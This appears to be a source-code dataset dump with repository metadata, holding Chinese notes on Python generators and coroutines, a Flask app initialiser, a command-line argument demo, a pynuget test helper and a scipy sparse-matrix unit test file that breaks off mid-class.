迭代器可以通过使用一个iter内建函数和一个序列来创建。
i = iter('abc')
i.next()
当序列遍历完,会抛出一个StopIteration异常
生成器
基于yield指令,可以暂停一个函数并返回中结果。该函数将保存执行环境并且可以在必要时间恢复。
def fibonacci():
a,b = 0,1
while True:
yield b
a,b = b,a + b
函数将会返回一个特殊的迭代器,也就是generator对象,它知道如何保存执行环境。对它的调用是不确定的,每
次都产生序列中下一个元素。
生成器对降低程序复杂性也有帮助,并且能够提升基于多个序列的数据转换算法的性能。
把每个序列当做一个迭代器,然后将它们合并到一个高级的函数中,这是一个避免函数变的庞大、丑陋
、不可理解的好办法。而且,还可以给整个处理链提供实时的反馈。
def power(values):
for value in values:
print 'powering %s' % value
yield value
def adder(values):
for value in values:
print 'adding to %s' % value
if value % 2 == 0:
yield value + 3
else:
yield value + 2
elements = [1,4,7,9,12,19]
res = adder(power(elements))
嵌套,多层的yield语句
res.next()
保持代码简单,而不是数据
拥有许多简单的处理序列的可迭代函数,要比一个复杂的每次计算一个值的函数更好一些。
python引入的与生成器相关的诸侯一个特性是提供了与next方法调用的代码进行交互的功能。yield将变成一个表达式
,而一个值可以通过名为send的新方法来传递。
def psychoologist():
print 'Please tell me your problems'
while True:
answer = (yield)
if answer is not None:
if answer.endswith('?'):
print ("Don't ask yourself too much questions")
elif 'good' in answer:
print "A that's good, go on"
elif 'bad' in answer:
print "Don't be so negative"
协同程序
协同程序可以挂起、恢复,并且可以有多个进入点的函数。有些语言本身就提供这种特性。如Io和Lua,它们可以实现协同的多任务和管道机制。
例如,每个协程程序将消费或生产成数据,然后暂停,知道其他数据被传递。
在python中,协同程序的替代者是线程,他可以实现代码块之间的交互。但是因为它们表现出一种抢先式的风格,所以必须注意资源锁,而协同陈旭不需要。这样的代码可能变得相当
复杂,难以创建和调试。但是生成器几乎就是协同程序,添加send,throw和close,qi初始的意图就是为该语言提供一种类似协同程序的特性。
import multitask
|
[
"liangchangyoujackson@gmail.com"
] |
liangchangyoujackson@gmail.com
|
cee8c8a80f0d94dd1e8ff71f232cf9abe16c0033
|
f0b6b2fdada21ba0c3cbd04144e7bc6c00eaf762
|
/standards/__init__.py
|
e183e96df57a78ff309bfe53cc1d1ed593a9eb2c
|
[] |
no_license
|
RomanSavran/ontology-api
|
437d079f5fa576c75a0b7e7ce535c07e54cac800
|
07aa35738e4314b9383d5e9b72ccffec675d3613
|
refs/heads/master
| 2023-01-19T20:57:16.042616
| 2020-11-16T08:23:19
| 2020-11-16T08:23:19
| 298,217,890
| 0
| 2
| null | 2020-11-16T08:23:20
| 2020-09-24T08:35:11
|
Python
|
UTF-8
|
Python
| false
| false
| 277
|
py
|
from flask import Flask
from logging.config import dictConfig
app = Flask(__name__)
app.config.from_object("standards.config.Config")
dictConfig(app.config.get('LOGGING_CONFIG', {}))
from standards.api import api_bp # noqa
app.register_blueprint(api_bp, url_prefix='/api/')
|
[
"y.beshta@uds.systems"
] |
y.beshta@uds.systems
|
d1ed2f23948319d744c9cc1b2926a9bf1b0c70c7
|
9ead001429ed7123063c38654a5f3cb2873ebd7c
|
/sce/slides/python/pra/Python Tutorial/Func3.py~
|
b27c2b1c6693e002479de887ad6775ca8d5c9f1e
|
[] |
no_license
|
smadala/IIIT-PG11
|
73646632de36c0774413f1e201d9ce14895ae645
|
a0f350261732442838314fcf821f7dad0a6c7b7b
|
refs/heads/master
| 2021-01-23T13:30:05.050032
| 2013-11-13T11:03:30
| 2013-11-13T11:03:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
#!/bin/python
import sys
# Function with command line arguments
def display(args):
print 'Number of arguments passed = ', len(args)
print 'Arguments passed = ', str(args)
display(sys.argv) # sys.argv = arguments passed from the command line
|
[
"satya@Satya-PC.(none)"
] |
satya@Satya-PC.(none)
|
|
22534f5284e4018a59dbe29907518cb3caa32436
|
768763d058a7ad809c7214d9b06619d5164d487c
|
/tests/helpers.py
|
9aca21e2c20f00076c1bbf280807897b49d31db8
|
[
"MIT"
] |
permissive
|
dougthor42/pynuget
|
14d764a3e0d853fd405f3d3ab02bd1433b0fb40f
|
a7a5e769badf57bb178200c1e788980840929936
|
refs/heads/master
| 2023-03-04T00:05:29.403875
| 2021-04-02T20:39:22
| 2021-04-02T20:39:22
| 130,394,863
| 7
| 2
|
MIT
| 2022-07-06T19:50:33
| 2018-04-20T17:38:11
|
Python
|
UTF-8
|
Python
| false
| false
| 593
|
py
|
# -*- coding: utf-8 -*-
"""
"""
import os
DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
def check_push(expected_code, client, header, file=None):
data = None
if file:
nupkg_file = os.path.join(DATA_DIR, file)
openf = open(nupkg_file, 'rb')
data = {'package': (openf, 'filename.nupkg')}
rv = client.put(
'/api/v2/package/',
headers=header,
follow_redirects=True,
data=data,
)
try:
openf.close()
except Exception:
pass
assert rv.status_code == expected_code
|
[
"doug.thor@gmail.com"
] |
doug.thor@gmail.com
|
d235f1c3797262d25e0f26ab7ec719b26e84ca21
|
c0f808504dd3d7fd27c39f1503fbc14c1d37bf9f
|
/sources/scipy-scipy-414c1ab/scipy/sparse/tests/test_base.py
|
2d2163b637b26a86195ddfd73774d3d76ce5e2f4
|
[] |
no_license
|
georgiee/lip-sync-lpc
|
7662102d4715e4985c693b316a02d11026ffb117
|
e931cc14fe4e741edabd12471713bf84d53a4250
|
refs/heads/master
| 2018-09-16T08:47:26.368491
| 2018-06-05T17:01:08
| 2018-06-05T17:01:08
| 5,779,592
| 17
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 65,539
|
py
|
#
# Authors: Travis Oliphant, Ed Schofield, Robert Cimrman, Nathan Bell, and others
""" Test functions for sparse matrices
"""
__usage__ = """
Build sparse:
python setup.py build
Run tests if scipy is installed:
python -c 'import scipy;scipy.sparse.test()'
Run tests if sparse is not installed:
python tests/test_sparse.py
"""
import sys
import warnings
import numpy as np
from numpy import arange, zeros, array, dot, matrix, asmatrix, asarray, \
vstack, ndarray, transpose, diag, kron, inf, conjugate, \
int8, ComplexWarning
import random
from numpy.testing import assert_raises, assert_equal, assert_array_equal, \
assert_array_almost_equal, assert_almost_equal, assert_, \
dec, TestCase, run_module_suite
import scipy.linalg
import scipy.sparse as sparse
from scipy.sparse import csc_matrix, csr_matrix, dok_matrix, \
coo_matrix, lil_matrix, dia_matrix, bsr_matrix, \
eye, isspmatrix, SparseEfficiencyWarning
from scipy.sparse.sputils import supported_dtypes
from scipy.sparse.linalg import splu, expm, inv
warnings.simplefilter('ignore', SparseEfficiencyWarning)
warnings.simplefilter('ignore', ComplexWarning)
#TODO check that spmatrix( ... , copy=X ) is respected
#TODO test prune
#TODO test has_sorted_indices
class _TestCommon:
"""test common functionality shared by all sparse formats"""
def setUp(self):
self.dat = matrix([[1,0,0,2],[3,0,1,0],[0,2,0,0]],'d')
self.datsp = self.spmatrix(self.dat)
def test_empty(self):
"""create empty matrices"""
assert_equal(self.spmatrix((3,3)).todense(), np.zeros((3,3)))
assert_equal(self.spmatrix((3,3)).nnz, 0)
def test_invalid_shapes(self):
assert_raises(ValueError, self.spmatrix, (-1,3) )
assert_raises(ValueError, self.spmatrix, (3,-1) )
assert_raises(ValueError, self.spmatrix, (-1,-1) )
def test_repr(self):
repr(self.datsp)
def test_str(self):
str(self.datsp)
def test_empty_arithmetic(self):
"""Test manipulating empty matrices. Fails in SciPy SVN <= r1768
"""
shape = (5, 5)
for mytype in [np.dtype('int32'), np.dtype('float32'),
np.dtype('float64'), np.dtype('complex64'),
np.dtype('complex128')]:
a = self.spmatrix(shape, dtype=mytype)
b = a + a
c = 2 * a
d = a * a.tocsc()
e = a * a.tocsr()
f = a * a.tocoo()
for m in [a,b,c,d,e,f]:
assert_equal(m.A, a.A*a.A)
# These fail in all revisions <= r1768:
assert_equal(m.dtype,mytype)
assert_equal(m.A.dtype,mytype)
def test_abs(self):
A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(abs(A),abs(self.spmatrix(A)).todense())
def test_neg(self):
A = matrix([[-1, 0, 17],[0, -5, 0],[1, -4, 0],[0,0,0]],'d')
assert_equal(-A,(-self.spmatrix(A)).todense())
def test_real(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.real.todense(),D.real)
def test_imag(self):
D = matrix([[1 + 3j, 2 - 4j]])
A = self.spmatrix(D)
assert_equal(A.imag.todense(),D.imag)
def test_diagonal(self):
"""Does the matrix's .diagonal() method work?
"""
mats = []
mats.append( [[1,0,2]] )
mats.append( [[1],[0],[2]] )
mats.append( [[0,1],[0,2],[0,3]] )
mats.append( [[0,0,1],[0,0,2],[0,3,0]] )
mats.append( kron(mats[0],[[1,2]]) )
mats.append( kron(mats[0],[[1],[2]]) )
mats.append( kron(mats[1],[[1,2],[3,4]]) )
mats.append( kron(mats[2],[[1,2],[3,4]]) )
mats.append( kron(mats[3],[[1,2],[3,4]]) )
mats.append( kron(mats[3],[[1,2,3,4]]) )
for m in mats:
assert_equal(self.spmatrix(m).diagonal(),diag(m))
def test_nonzero(self):
A = array([[1, 0, 1],[0, 1, 1],[ 0, 0, 1]])
Asp = self.spmatrix(A)
A_nz = set( [tuple(ij) for ij in transpose(A.nonzero())] )
Asp_nz = set( [tuple(ij) for ij in transpose(Asp.nonzero())] )
assert_equal(A_nz, Asp_nz)
def test_getrow(self):
assert_array_equal(self.datsp.getrow(1).todense(), self.dat[1,:])
assert_array_equal(self.datsp.getrow(-1).todense(), self.dat[-1,:])
def test_getcol(self):
assert_array_equal(self.datsp.getcol(1).todense(), self.dat[:,1])
assert_array_equal(self.datsp.getcol(-1).todense(), self.dat[:,-1])
def test_sum(self):
"""Does the matrix's .sum(axis=...) method work?
"""
assert_array_equal(self.dat.sum(), self.datsp.sum())
assert_array_equal(self.dat.sum(axis=None), self.datsp.sum(axis=None))
assert_array_equal(self.dat.sum(axis=0), self.datsp.sum(axis=0))
assert_array_equal(self.dat.sum(axis=1), self.datsp.sum(axis=1))
def test_mean(self):
"""Does the matrix's .mean(axis=...) method work?
"""
assert_array_equal(self.dat.mean(), self.datsp.mean())
assert_array_equal(self.dat.mean(axis=None), self.datsp.mean(axis=None))
assert_array_equal(self.dat.mean(axis=0), self.datsp.mean(axis=0))
assert_array_equal(self.dat.mean(axis=1), self.datsp.mean(axis=1))
def test_expm(self):
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], float)
sM = self.spmatrix(M, shape=(3,3), dtype=float)
Mexp = scipy.linalg.expm(M)
sMexp = expm(sM).todense()
assert_array_almost_equal((sMexp - Mexp), zeros((3, 3)))
N = array([[ 3., 0., 1.], [ 0., 2., 0.], [ 0., 0., 0.]])
sN = self.spmatrix(N, shape=(3,3), dtype=float)
Nexp = scipy.linalg.expm(N)
sNexp = expm(sN).todense()
assert_array_almost_equal((sNexp - Nexp), zeros((3, 3)))
def test_inv(self):
M = array([[1, 0, 2], [0, 0, 3], [-4, 5, 6]], float)
sM = self.spmatrix(M, shape=(3,3), dtype=float)
sMinv = inv(sM)
assert_array_almost_equal(sMinv.dot(sM).todense(), np.eye(3))
def test_from_array(self):
A = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
A = array([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_matrix(self):
A = matrix([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
assert_array_equal(self.spmatrix(A).todense(), A)
A = matrix([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
assert_array_equal(self.spmatrix(A).toarray(), A)
assert_array_equal(self.spmatrix(A, dtype='int16').toarray(), A.astype('int16'))
def test_from_list(self):
A = [[1,0,0],[2,3,4],[0,5,0],[0,0,0]]
assert_array_equal(self.spmatrix(A).todense(), A)
A = [[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]]
assert_array_equal(self.spmatrix(A).toarray(), array(A))
assert_array_equal(self.spmatrix(A, dtype='int16').todense(), array(A).astype('int16'))
def test_from_sparse(self):
D = array([[1,0,0],[2,3,4],[0,5,0],[0,0,0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
D = array([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
S = csr_matrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
S = self.spmatrix(D)
assert_array_equal(self.spmatrix(S).toarray(), D)
assert_array_equal(self.spmatrix(S, dtype='int16').toarray(), D.astype('int16'))
#def test_array(self):
# """test array(A) where A is in sparse format"""
# assert_equal( array(self.datsp), self.dat )
def test_todense(self):
# Check C-contiguous (default).
chk = self.datsp.todense()
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.todense(order='C')
assert_array_equal(chk, self.dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.todense(order='F')
assert_array_equal(chk, self.dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with out argument (array).
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk.base is out)
# Check with out array (matrix).
out = np.asmatrix(np.zeros(self.datsp.shape, dtype=self.datsp.dtype))
chk = self.datsp.todense(out=out)
assert_array_equal(self.dat, out)
assert_array_equal(self.dat, chk)
assert_(chk is out)
a = matrix([1.,2.,3.])
dense_dot_dense = a * self.dat
check = a * self.datsp.todense()
assert_array_equal(dense_dot_dense, check)
b = matrix([1.,2.,3.,4.]).T
dense_dot_dense = self.dat * b
check2 = self.datsp.todense() * b
assert_array_equal(dense_dot_dense, check2)
def test_toarray(self):
# Check C-contiguous (default).
dat = asarray(self.dat)
chk = self.datsp.toarray()
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check C-contiguous (with arg).
chk = self.datsp.toarray(order='C')
assert_array_equal(chk, dat)
assert_(chk.flags.c_contiguous)
assert_(not chk.flags.f_contiguous)
# Check F-contiguous (with arg).
chk = self.datsp.toarray(order='F')
assert_array_equal(chk, dat)
assert_(not chk.flags.c_contiguous)
assert_(chk.flags.f_contiguous)
# Check with output arg.
out = np.zeros(self.datsp.shape, dtype=self.datsp.dtype)
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
# Check that things are fine when we don't initialize with zeros.
out[...] = 1.
self.datsp.toarray(out=out)
assert_array_equal(chk, dat)
a = array([1.,2.,3.])
dense_dot_dense = dot(a, dat)
check = dot(a, self.datsp.toarray())
assert_array_equal(dense_dot_dense, check)
b = array([1.,2.,3.,4.])
dense_dot_dense = dot(dat, b)
check2 = dot(self.datsp.toarray(), b)
assert_array_equal(dense_dot_dense, check2)
def test_astype(self):
D = array([[1.0 + 3j, 0, 0],
[ 0, 2.0 + 5, 0],
[ 0, 0, 0]])
S = self.spmatrix(D)
for x in supported_dtypes:
assert_equal(S.astype(x).dtype, D.astype(x).dtype) # correct type
assert_equal(S.astype(x).toarray(), D.astype(x)) # correct values
assert_equal(S.astype(x).format, S.format) # format preserved
def test_asfptype(self):
A = self.spmatrix( arange(6,dtype='int32').reshape(2,3) )
assert_equal( A.dtype , np.dtype('int32') )
assert_equal( A.asfptype().dtype, np.dtype('float64') )
assert_equal( A.asfptype().format, A.format )
assert_equal( A.astype('int16').asfptype().dtype , np.dtype('float32') )
assert_equal( A.astype('complex128').asfptype().dtype , np.dtype('complex128') )
B = A.asfptype()
C = B.asfptype()
assert_( B is C )
def test_mul_scalar(self):
assert_array_equal(self.dat*2,(self.datsp*2).todense())
assert_array_equal(self.dat*17.3,(self.datsp*17.3).todense())
def test_rmul_scalar(self):
assert_array_equal(2*self.dat,(2*self.datsp).todense())
assert_array_equal(17.3*self.dat,(17.3*self.datsp).todense())
def test_add(self):
a = self.dat.copy()
a[0,2] = 2.0
b = self.datsp
c = b + a
assert_array_equal(c,[[2,0,2,4],[6,0,2,0],[0,4,0,0]])
def test_radd(self):
a = self.dat.copy()
a[0,2] = 2.0
b = self.datsp
c = a + b
assert_array_equal(c,[[2,0,2,4],[6,0,2,0],[0,4,0,0]])
def test_sub(self):
assert_array_equal((self.datsp - self.datsp).todense(),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((self.datsp - A).todense(),self.dat - A.todense())
assert_array_equal((A - self.datsp).todense(),A.todense() - self.dat)
def test_rsub(self):
assert_array_equal((self.dat - self.datsp),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
assert_array_equal((self.datsp - self.dat),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((self.dat - A),self.dat - A.todense())
assert_array_equal((A - self.dat),A.todense() - self.dat)
assert_array_equal(A.todense() - self.datsp,A.todense() - self.dat)
assert_array_equal(self.datsp - A.todense(),self.dat - A.todense())
def test_add0(self):
""" Adding 0 to a sparse matrix """
assert_array_equal((self.datsp + 0).todense(), self.dat)
# use sum (which takes 0 as a starting value)
sumS = sum([k * self.datsp for k in range(1, 3)])
sumD = sum([k * self.dat for k in range(1, 3)])
assert_almost_equal(sumS.todense(), sumD)
def test_elementwise_multiply(self):
# real/real
A = array([[4,0,9],[2,-3,5]])
B = array([[0,7,0],[0,-4,0]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal( Asp.multiply(Bsp).todense(), A*B) #sparse/sparse
assert_almost_equal( Asp.multiply(B), A*B) #sparse/dense
# complex/complex
C = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
D = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Csp = self.spmatrix(C)
Dsp = self.spmatrix(D)
assert_almost_equal( Csp.multiply(Dsp).todense(), C*D) #sparse/sparse
assert_almost_equal( Csp.multiply(D), C*D) #sparse/dense
# real/complex
assert_almost_equal( Asp.multiply(Dsp).todense(), A*D) #sparse/sparse
assert_almost_equal( Asp.multiply(D), A*D) #sparse/dense
def test_elementwise_divide(self):
expected = [[1,0,0,1],[1,0,1,0],[0,1,0,0]]
assert_array_equal((self.datsp / self.datsp).todense(),expected)
denom = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
res = matrix([[1,0,0,0.5],[-3,0,inf,0],[0,0.25,0,0]],'d')
assert_array_equal((self.datsp / denom).todense(),res)
# complex
A = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
B = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal( (Asp / Bsp).todense(), A/B)
def test_pow(self):
A = matrix([[1,0,2,0],[0,3,4,0],[0,5,0,0],[0,6,7,8]])
B = self.spmatrix( A )
for exponent in [0,1,2,3]:
assert_array_equal((B**exponent).todense(),A**exponent)
#invalid exponents
for exponent in [-1, 2.2, 1 + 3j]:
self.assertRaises( Exception, B.__pow__, exponent )
#nonsquare matrix
B = self.spmatrix(A[:3,:])
self.assertRaises( Exception, B.__pow__, 1 )
def test_rmatvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
assert_array_almost_equal([1,2,3,4]*M, dot([1,2,3,4], M.toarray()))
row = matrix([[1,2,3,4]])
assert_array_almost_equal(row*M, row*M.todense())
def test_small_multiplication(self):
"""test that A*x works for x with shape () (1,) and (1,1)
"""
A = self.spmatrix([[1],[2],[3]])
assert_(isspmatrix(A * array(1)))
assert_equal((A * array(1)).todense(), [[1],[2],[3]])
assert_equal(A * array([1]), array([1,2,3]))
assert_equal(A * array([[1]]), array([[1],[2],[3]]))
def test_matvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
col = matrix([1,2,3]).T
assert_array_almost_equal(M * col, M.todense() * col)
#check result dimensions (ticket #514)
assert_equal((M * array([1,2,3])).shape,(4,))
assert_equal((M * array([[1],[2],[3]])).shape,(4,1))
assert_equal((M * matrix([[1],[2],[3]])).shape,(4,1))
#check result type
assert_(isinstance( M * array([1,2,3]), ndarray))
assert_(isinstance( M * matrix([1,2,3]).T, matrix))
#ensure exception is raised for improper dimensions
bad_vecs = [array([1,2]), array([1,2,3,4]), array([[1],[2]]),
matrix([1,2,3]), matrix([[1],[2]])]
for x in bad_vecs:
assert_raises(ValueError, M.__mul__, x)
# Should this be supported or not?!
#flat = array([1,2,3])
#assert_array_almost_equal(M*flat, M.todense()*flat)
# Currently numpy dense matrices promote the result to a 1x3 matrix,
# whereas sparse matrices leave the result as a rank-1 array. Which
# is preferable?
# Note: the following command does not work. Both NumPy matrices
# and spmatrices should raise exceptions!
# assert_array_almost_equal(M*[1,2,3], M.todense()*[1,2,3])
# The current relationship between sparse matrix products and array
# products is as follows:
assert_array_almost_equal(M*array([1,2,3]), dot(M.A,[1,2,3]))
assert_array_almost_equal(M*[[1],[2],[3]], asmatrix(dot(M.A,[1,2,3])).T)
# Note that the result of M * x is dense if x has a singleton dimension.
# Currently M.matvec(asarray(col)) is rank-1, whereas M.matvec(col)
# is rank-2. Is this desirable?
def test_matmat_sparse(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
a2 = array([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
b = matrix([[0,1],[1,0],[0,2]],'d')
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
assert_array_almost_equal((asp*bsp).todense(), a*b)
assert_array_almost_equal( asp*b, a*b)
assert_array_almost_equal( a*bsp, a*b)
assert_array_almost_equal( a2*bsp, a*b)
# Now try performing cross-type multplication:
csp = bsp.tocsc()
c = b
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocsr()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocoo()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
# Test provided by Andy Fraser, 2006-03-26
L = 30
frac = .3
random.seed(0) # make runs repeatable
A = zeros((L,2))
for i in xrange(L):
for j in xrange(2):
r = random.random()
if r < frac:
A[i,j] = r/frac
A = self.spmatrix(A)
B = A*A.T
assert_array_almost_equal(B.todense(), A.todense() * A.T.todense())
assert_array_almost_equal(B.todense(), A.todense() * A.todense().T)
# check dimension mismatch 2x2 times 3x2
A = self.spmatrix( [[1,2],[3,4]] )
B = self.spmatrix( [[1,2],[3,4],[5,6]] )
assert_raises(ValueError, A.__mul__, B)
def test_matmat_dense(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
asp = self.spmatrix(a)
# check both array and matrix types
bs = [ array([[1,2],[3,4],[5,6]]), matrix([[1,2],[3,4],[5,6]]) ]
for b in bs:
result = asp*b
assert_( isinstance(result, type(b)) )
assert_equal( result.shape, (4,2) )
assert_equal( result, dot(a,b) )
def test_sparse_format_conversions(self):
A = sparse.kron( [[1,0,2],[0,3,4],[5,0,0]], [[1,2],[0,3]] )
D = A.todense()
A = self.spmatrix(A)
for format in ['bsr','coo','csc','csr','dia','dok','lil']:
a = A.asformat(format)
assert_equal(a.format,format)
assert_array_equal(a.todense(), D)
b = self.spmatrix(D+3j).asformat(format)
assert_equal(b.format,format)
assert_array_equal(b.todense(), D+3j)
c = eval(format + '_matrix')(A)
assert_equal(c.format,format)
assert_array_equal(c.todense(), D)
def test_tobsr(self):
x = array([[1,0,2,0],[0,0,0,0],[0,0,4,5]])
y = array([[0,1,2],[3,0,5]])
A = kron(x,y)
Asp = self.spmatrix(A)
for format in ['bsr']:
fn = getattr(Asp, 'to' + format )
for X in [ 1, 2, 3, 6 ]:
for Y in [ 1, 2, 3, 4, 6, 12]:
assert_equal( fn(blocksize=(X,Y)).todense(), A)
def test_transpose(self):
a = self.datsp.transpose()
b = self.dat.transpose()
assert_array_equal(a.todense(), b)
assert_array_equal(a.transpose().todense(), self.dat)
assert_array_equal( self.spmatrix((3,4)).T.todense(), zeros((4,3)) )
def test_add_dense(self):
""" adding a dense matrix to a sparse matrix
"""
sum1 = self.dat + self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = self.datsp + self.dat
assert_array_equal(sum2, 2*self.dat)
def test_sub_dense(self):
""" subtracting a dense matrix to/from a sparse matrix
"""
sum1 = 3*self.dat - self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = 3*self.datsp - self.dat
assert_array_equal(sum2, 2*self.dat)
def test_copy(self):
""" Check whether the copy=True and copy=False keywords work
"""
A = self.datsp
#check that copy preserves format
assert_equal(A.copy().format, A.format)
assert_equal(A.__class__(A,copy=True).format, A.format)
assert_equal(A.__class__(A,copy=False).format, A.format)
assert_equal(A.copy().todense(), A.todense())
assert_equal(A.__class__(A,copy=True).todense(), A.todense())
assert_equal(A.__class__(A,copy=False).todense(), A.todense())
#check that XXX_matrix.toXXX() works
toself = getattr(A,'to' + A.format)
assert_equal(toself().format, A.format)
assert_equal(toself(copy=True).format, A.format)
assert_equal(toself(copy=False).format, A.format)
assert_equal(toself().todense(), A.todense())
assert_equal(toself(copy=True).todense(), A.todense())
assert_equal(toself(copy=False).todense(), A.todense())
# check whether the data is copied?
# TODO: deal with non-indexable types somehow
B = A.copy()
try:
B[0,0] += 1
assert_(B[0,0] != A[0,0])
except NotImplementedError:
# not all sparse matrices can be indexed
pass
except TypeError:
# not all sparse matrices can be indexed
pass
# Eventually we'd like to allow matrix products between dense
# and sparse matrices using the normal dot() function:
#def test_dense_dot_sparse(self):
# a = array([1.,2.,3.])
# dense_dot_dense = dot(a, self.dat)
# dense_dot_sparse = dot(a, self.datsp)
# assert_array_equal(dense_dot_dense, dense_dot_sparse)
#def test_sparse_dot_dense(self):
# b = array([1.,2.,3.,4.])
# dense_dot_dense = dot(self.dat, b)
# dense_dot_sparse = dot(self.datsp, b)
# assert_array_equal(dense_dot_dense, dense_dot_sparse)
class _TestInplaceArithmetic:
def test_imul_scalar(self):
a = self.datsp.copy()
a *= 2
assert_array_equal(self.dat*2,a.todense())
a = self.datsp.copy()
a *= 17.3
assert_array_equal(self.dat*17.3,a.todense())
def test_idiv_scalar(self):
a = self.datsp.copy()
a /= 2
assert_array_equal(self.dat/2,a.todense())
a = self.datsp.copy()
a /= 17.3
assert_array_equal(self.dat/17.3,a.todense())
class _TestGetSet:
def test_setelement(self):
A = self.spmatrix((3,4))
A[ 0, 0] = 0 # bug 870
A[ 1, 2] = 4.0
A[ 0, 1] = 3
A[ 2, 0] = 2.0
A[ 0,-1] = 8
A[-1,-2] = 7
A[ 0, 1] = 5
assert_array_equal(A.todense(),[[0,5,0,8],[0,0,4,0],[2,0,7,0]])
for ij in [(0,4),(-1,4),(3,0),(3,4),(3,-1)]:
assert_raises(IndexError, A.__setitem__, ij, 123.0)
for v in [[1,2,3], array([1,2,3])]:
assert_raises(ValueError, A.__setitem__, (0,0), v)
for v in [3j]:
assert_raises(TypeError, A.__setitem__, (0,0), v)
def test_getelement(self):
D = array([[1,0,0],
[4,3,0],
[0,2,0],
[0,0,0]])
A = self.spmatrix(D)
M,N = D.shape
for i in range(-M, M):
for j in range(-N, N):
assert_equal(A[i,j], D[i,j])
for ij in [(0,3),(-1,3),(4,0),(4,3),(4,-1)]:
assert_raises(IndexError, A.__getitem__, ij)
class _TestSolve:
def test_solve(self):
""" Test whether the lu_solve command segfaults, as reported by Nils
Wagner for a 64-bit machine, 02 March 2005 (EJS)
"""
n = 20
np.random.seed(0) #make tests repeatable
A = zeros((n,n), dtype=complex)
x = np.random.rand(n)
y = np.random.rand(n-1)+1j*np.random.rand(n-1)
r = np.random.rand(n)
for i in range(len(x)):
A[i,i] = x[i]
for i in range(len(y)):
A[i,i+1] = y[i]
A[i+1,i] = conjugate(y[i])
A = self.spmatrix(A)
x = splu(A).solve(r)
assert_almost_equal(A*x,r)
class _TestHorizSlicing:
"""Tests horizontal slicing (e.g. [0, :]). Tests for individual sparse
matrix types that implement this should derive from this class.
"""
def test_get_horiz_slice(self):
"""Test for new slice functionality (EJS)"""
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[1,:], A[1,:].todense())
assert_array_equal(B[1,2:5], A[1,2:5].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1, 1:3], D[1, 1:3].todense())
# Now test slicing when a row contains only zeros
E = matrix([[1, 2, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1, 1:3], F[1, 1:3].todense())
